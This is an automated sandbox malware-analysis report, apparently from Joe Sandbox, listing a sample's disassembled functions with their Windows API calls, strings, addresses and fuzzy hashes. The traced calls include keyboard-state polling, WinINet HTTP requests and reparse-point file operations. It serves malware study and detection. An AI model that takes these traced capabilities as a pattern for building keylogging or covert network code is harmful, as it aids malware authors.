                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DC62E6
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00DC62FB
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00DC6301
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC6311
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00DC6317
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DC6338
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DC6352
                                                                                              • GetWindowRect.USER32(?,?), ref: 00DC635B
                                                                                              • _wcslen.LIBCMT ref: 00DC63C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00DC63FE
                                                                                              • GetDesktopWindow.USER32 ref: 00DC6404
                                                                                              • GetWindowRect.USER32(00000000), ref: 00DC640B
                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DC6462
                                                                                              • GetClientRect.USER32(?,?), ref: 00DC646F
                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00DC6494
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DC64BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 895679908-0
                                                                                              • Opcode ID: b1a0fca779654a9260e808c573c47724420a9606a440c420a07ccdff413ca9ac
                                                                                              • Instruction ID: e81d86847aa8ba656e9aaebc01ba1a0ab384f2b6617460937db3383a5a5c2a20
                                                                                              • Opcode Fuzzy Hash: b1a0fca779654a9260e808c573c47724420a9606a440c420a07ccdff413ca9ac
                                                                                              • Instruction Fuzzy Hash: 7A71493190070AAFDB209FA8CE45FAEBBF6EB48705F14451CE586A36A0D775E944CB20
                                                                                              Function 00DE076B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00DE0784
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00DE078F
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00DE079A
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00DE07A5
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00DE07B0
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00DE07BB
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00DE07C6
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00DE07D1
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00DE07DC
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00DE07E7
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00DE07F2
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00DE07FD
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00DE0808
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00DE0813
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00DE081E
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00DE0829
                                                                                              • GetCursorInfo.USER32(?), ref: 00DE0839
                                                                                              • GetLastError.KERNEL32 ref: 00DE087B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: a4d316d20c2063fd0c60a03472023db195fd31e8075b025670b052bf7a04525a
                                                                                              • Instruction ID: 0723e97e6be87baf844ebfaaae5c5b6beec4ab5fb7233353d91dc965b989ec0d
                                                                                              • Opcode Fuzzy Hash: a4d316d20c2063fd0c60a03472023db195fd31e8075b025670b052bf7a04525a
                                                                                              • Instruction Fuzzy Hash: 80417470D083596BDB10AFBA8CC585EBFE8FF04354B54452AE11CE7291DA78E841CFA0
                                                                                              Function 00D80456 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D80456
                                                                                                • Part of subcall function 00D8047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E3170C,00000FA0,179ED815,?,?,?,?,00DA2753,000000FF), ref: 00D804AC
                                                                                                • Part of subcall function 00D8047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00DA2753,000000FF), ref: 00D804B7
                                                                                                • Part of subcall function 00D8047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00DA2753,000000FF), ref: 00D804C8
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D804DE
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D804EC
                                                                                                • Part of subcall function 00D8047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D804FA
                                                                                                • Part of subcall function 00D8047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D80525
                                                                                                • Part of subcall function 00D8047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D80530
                                                                                              • ___scrt_fastfail.LIBCMT ref: 00D80477
                                                                                                • Part of subcall function 00D80433: __onexit.LIBCMT ref: 00D80439
                                                                                              Strings
                                                                                              • SleepConditionVariableCS, xrefs: 00D804E4
                                                                                              • WakeAllConditionVariable, xrefs: 00D804F2
                                                                                              • InitializeConditionVariable, xrefs: 00D804D8
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D804B2
                                                                                              • kernel32.dll, xrefs: 00D804C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 66158676-1714406822
                                                                                              • Opcode ID: 5b865c3ae08e9015398e7c1642a2850c307cbcb30771f17d23d2fef86557f8bd
                                                                                              • Instruction ID: 7695daf0dff8cbcb8def33007fd54e7d16a79da4c8b045e243828a87ecdabf20
                                                                                              • Opcode Fuzzy Hash: 5b865c3ae08e9015398e7c1642a2850c307cbcb30771f17d23d2fef86557f8bd
                                                                                              • Instruction Fuzzy Hash: D821F932A443056FD7507BA8AC09B293FD9EB06F61F054159F901E62D0DFB09C48CB71
                                                                                              Function 00DE4946 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00DFDCD0), ref: 00DE4A18
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00DE4A2A
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00DFDCD0), ref: 00DE4A4F
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00DFDCD0), ref: 00DE4A9B
                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,00DFDCD0), ref: 00DE4B05
                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00DE4BBF
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DE4C25
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00DE4C4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                                                              • API String ID: 354098117-199464113
                                                                                              • Opcode ID: 72592cf3b8cf9b6b9fcd31227dc97b462f2e5d2f2365a6fc8414fafedd95f85c
                                                                                              • Instruction ID: 7e40b637fe9e8817d908ebec6d02fb56ddfb4f7954c06d238d651622e021d4ba
                                                                                              • Opcode Fuzzy Hash: 72592cf3b8cf9b6b9fcd31227dc97b462f2e5d2f2365a6fc8414fafedd95f85c
                                                                                              • Instruction Fuzzy Hash: D3124B71A00245EFDB14DF95C884EAEB7B5FF49718F288098F909AB251D731ED42CBA0
                                                                                              Function 00DDCDD3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DDCE0D
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DDCE20
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DDCE34
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DDCE4D
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DDCE90
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DDCEA6
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DDCEB1
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DDCEE1
                                                                                              • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DDCF39
                                                                                              • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DDCF4D
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00DDCF58
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 3800310941-3916222277
                                                                                              • Opcode ID: 7a5f7c0c49da92acedff8d492dbf4c98acb3e40ad3bd3f01c311d4f601b8cd88
                                                                                              • Instruction ID: 3b3ab6f6268dfc0c97b1584bbdcc7a614b0073f4b75bb2c25a630b4d0f9a07eb
                                                                                              • Opcode Fuzzy Hash: 7a5f7c0c49da92acedff8d492dbf4c98acb3e40ad3bd3f01c311d4f601b8cd88
                                                                                              • Instruction Fuzzy Hash: E05147B151130ABFDB219F60C988ABA7BBEEF08754F14941AF946D6310D734E944EBB0
                                                                                              Function 00DCC80C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(00E32990,000000FF,00000000,00000030), ref: 00DCC888
                                                                                              • SetMenuItemInfoW.USER32(00E32990,00000004,00000000,00000030), ref: 00DCC8BD
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00DCC8CF
                                                                                              • GetMenuItemCount.USER32(?), ref: 00DCC915
                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00DCC932
                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00DCC95E
                                                                                              • GetMenuItemID.USER32(?,?), ref: 00DCC9A5
                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DCC9EB
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCCA00
                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DCCA21
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                              • String ID: 0
                                                                                              • API String ID: 1460738036-4108050209
                                                                                              • Opcode ID: 9819d12e3f18dbcfe99b2bccde11ba0c8164c295948d0610cf916f50efb7cd39
                                                                                              • Instruction ID: a0afeb22feeb22c23995fb982bc5d21287ba676dca288136cd0a0e20c0da3c9c
                                                                                              • Opcode Fuzzy Hash: 9819d12e3f18dbcfe99b2bccde11ba0c8164c295948d0610cf916f50efb7cd39
                                                                                              • Instruction Fuzzy Hash: A6615BB091024AAFDB11CF64D888FBEBBA9EB05305F185119EA49E3251DB34ED45CB70
                                                                                              Function 00DCE3D7 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DCE3E9
                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DCE40F
                                                                                              • _wcslen.LIBCMT ref: 00DCE419
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00DCE469
                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DCE485
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 1939486746-1459072770
                                                                                              • Opcode ID: b2b02ef0c46b7b3b2e68139a8abff41ec662c44a7c1895434fe3f34b72719104
                                                                                              • Instruction ID: 0c4586f3f27df48fd7f56ccd8a814cad616b94e544ef54715333cb4335ea492e
                                                                                              • Opcode Fuzzy Hash: b2b02ef0c46b7b3b2e68139a8abff41ec662c44a7c1895434fe3f34b72719104
                                                                                              • Instruction Fuzzy Hash: 8B4101B26403197AEB04BB649C47EBE7BADDF45320F14405AF940E71C2EB78DA0193B5
                                                                                              Function 00DD4678 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DD469A
                                                                                              • _wcslen.LIBCMT ref: 00DD46C7
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DD46F7
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DD4718
                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00DD4728
                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DD47AF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DD47BA
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DD47C5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                              • String ID: :$\$\??\%s
                                                                                              • API String ID: 1149970189-3457252023
                                                                                              • Opcode ID: d7b12649d8dd20127137c62a0ef75a086ac3a86fdceb604126ac578700d2db44
                                                                                              • Instruction ID: 1a6cadb186b256e1eb48456755c18c428c2249479c205ea5b309bf3ecf40247a
                                                                                              • Opcode Fuzzy Hash: d7b12649d8dd20127137c62a0ef75a086ac3a86fdceb604126ac578700d2db44
                                                                                              • Instruction Fuzzy Hash: 8731B271900219BBDB209FA0DC89FEB37BEEF89740F1441A6F619D6260E7709644CB74
                                                                                              Function 00DCA86D Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?), ref: 00DCA8EE
                                                                                              • SetKeyboardState.USER32(?), ref: 00DCA959
                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00DCA979
                                                                                              • GetKeyState.USER32(000000A0), ref: 00DCA990
                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00DCA9BF
                                                                                              • GetKeyState.USER32(000000A1), ref: 00DCA9D0
                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00DCA9FC
                                                                                              • GetKeyState.USER32(00000011), ref: 00DCAA0A
                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00DCAA33
                                                                                              • GetKeyState.USER32(00000012), ref: 00DCAA41
                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00DCAA6A
                                                                                              • GetKeyState.USER32(0000005B), ref: 00DCAA78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: State$Async$Keyboard
                                                                                              • String ID:
                                                                                              • API String ID: 541375521-0
                                                                                              • Opcode ID: 652b9b27317e37e46b190b744ab24181d4f9a822009a332ddc622e560e9423e4
                                                                                              • Instruction ID: f49e8efe9cacb1e7668918175d47283946402bf0e2ad7964ca5684c7b91ce3a1
                                                                                              • Opcode Fuzzy Hash: 652b9b27317e37e46b190b744ab24181d4f9a822009a332ddc622e560e9423e4
                                                                                              • Instruction Fuzzy Hash: 0951F82090478E6AEB35E7B44815FEABFB49F11348F4C858EC5C25B1C2DA649A4CCB72
                                                                                              Function 00DC6555 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00DC6571
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC658A
                                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DC65E8
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00DC65F8
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC660A
                                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DC665E
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00DC666C
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00DC667E
                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DC66C0
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00DC66D3
                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DC66E9
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC66F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                              • String ID:
                                                                                              • API String ID: 3096461208-0
                                                                                              • Opcode ID: 3800e673757c4a48ab0c84376965827a14cf10da0c6957b662dcc3119965f4b4
                                                                                              • Instruction ID: b5420188497842e168468e3f8b26022e53667d767ff714db4deee6c20db315e7
                                                                                              • Opcode Fuzzy Hash: 3800e673757c4a48ab0c84376965827a14cf10da0c6957b662dcc3119965f4b4
                                                                                              • Instruction Fuzzy Hash: 71510E71A0020AAFDF08CF68DD89AAE7BB6BB48301F148129F915E7294D770DD04CB60
                                                                                              Function 00D620D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00D621E4: GetWindowLongW.USER32(?,000000EB), ref: 00D621F2
                                                                                              • GetSysColor.USER32(0000000F), ref: 00D62102
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ColorLongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 259745315-0
                                                                                              • Opcode ID: 3a7fefcd72798cb66eed4cdb8dbef641e6282496651be06066daaa908411a2cb
                                                                                              • Instruction ID: 75a0083e765e032c81a4fba0e0022f52dae6b5222482c9870be74b2edfd38301
                                                                                              • Opcode Fuzzy Hash: 3a7fefcd72798cb66eed4cdb8dbef641e6282496651be06066daaa908411a2cb
                                                                                              • Instruction Fuzzy Hash: A0419131544B44AFDB205F38DC48BBA3B67AB47321F188645FAA28B2E1C7359D42DB30
                                                                                              Function 00DF48F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00DF499A
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00DF49A1
                                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00DF49B4
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00DF49BC
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DF49C7
                                                                                              • DeleteDC.GDI32(00000000), ref: 00DF49D1
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00DF49DB
